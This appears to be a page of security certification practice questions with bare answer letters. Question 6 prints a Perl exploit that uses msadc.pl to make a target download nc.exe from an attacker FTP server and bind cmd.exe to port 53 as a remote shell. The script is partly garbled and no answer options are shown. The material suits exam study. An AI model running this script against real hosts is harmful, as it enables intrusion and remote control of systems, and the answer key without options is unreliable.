00:00

QUESTION 6

Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...n";
print "Server will download the file nc.exe from $your FTP server.n"; system("perl
msadc.pl -h
$host -C "echo
open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile"");
system
("perl msadc.pl -h
$host -C "echo $pass>>sasfile""); system("perl msadc.pl -h $host -C "echo
bin>>sasfile"");
system("perl
msadc.pl -h $host -C "echo get nc.exe>>sasfile""); system("perl msadc.pl -h $host -C
"echo get
hacked.
html>>sasfile""); system("perl msadc.pl -h $host -C "echo quit>>sasfile""); print "Server
is
downloading ...
n";
system("perl msadc.pl -h $host -C "ftp -s:sasfile""); print "Press ENTER when download
is
finished ...
(Have a ftp server)n";
$o=; print "Opening ...n";
system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

Correct Answer: D

QUESTION 7

Which of the following statements are true about snort?
Each correct answer represents a complete solution. Choose all that apply.

Correct Answer: ABD

QUESTION 8

Which of the following tools is used to detect round-robin-load-balancing?

Correct Answer: D

QUESTION 9

Which of the following well-known ports is used by BOOTP?

Correct Answer: D

QUESTION 10

Which of the following is the primary TCP/IP protocol used to transfer text and binary files over the Internet?

Correct Answer: C